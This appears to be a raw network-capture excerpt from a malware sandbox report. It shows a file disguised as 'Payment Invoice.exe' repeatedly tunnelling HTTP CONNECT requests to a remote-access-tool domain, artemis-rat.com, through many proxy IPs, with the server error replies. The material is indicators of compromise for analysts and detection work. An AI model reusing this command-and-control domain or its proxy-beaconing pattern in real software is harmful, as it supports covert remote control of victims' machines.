                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1382192.168.2.45340872.49.49.11310347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.695199966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1383192.168.2.452212202.144.157.190097076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.700853109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.984527111 CET20INHTTP/1.0 200 OK
                                                                Data Raw: 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1384192.168.2.45417951.79.87.14485337076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.705050945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.323910952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.028490067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.515149117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.527035952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.515064955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.527384996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.323956966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.714287043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1385192.168.2.45360964.227.108.25319087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.721698999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1386192.168.2.453319212.220.13.9841537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.727215052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1387192.168.2.454218172.67.181.37807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.744963884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.899471045 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1388192.168.2.454237172.67.181.9807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.764463902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.918732882 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1389192.168.2.454190203.222.24.36807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.766921043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.061135054 CET340INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.12.2
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1390192.168.2.4541468.217.143.187156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.770936012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1391192.168.2.454140157.185.173.217265897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.775288105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1392192.168.2.454255104.20.51.99807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.779555082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.935101032 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1393192.168.2.454257172.67.181.149807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.779613972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.935220957 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1394192.168.2.45413931.134.151.40807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.779702902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1395192.168.2.454271172.67.181.107807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.782581091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.937911987 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1396192.168.2.454280104.24.136.68807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.787369967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.942516088 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1397192.168.2.45419827.96.235.171807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.789033890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1398192.168.2.45416594.131.14.6610817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.794146061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1399192.168.2.454312192.154.246.9690007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.858108044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1400192.168.2.454326104.21.80.83807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.858383894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.012844086 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1401192.168.2.454155103.166.141.74200747076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.859781027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1402192.168.2.454349172.67.255.224807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.860935926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.015355110 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1403192.168.2.45422872.10.160.17317957076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.861108065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1404192.168.2.454304104.17.66.69807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.862859011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.017577887 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1405192.168.2.45430251.161.99.114297587076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.878549099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.480038881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.248862028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.589775085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183475018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
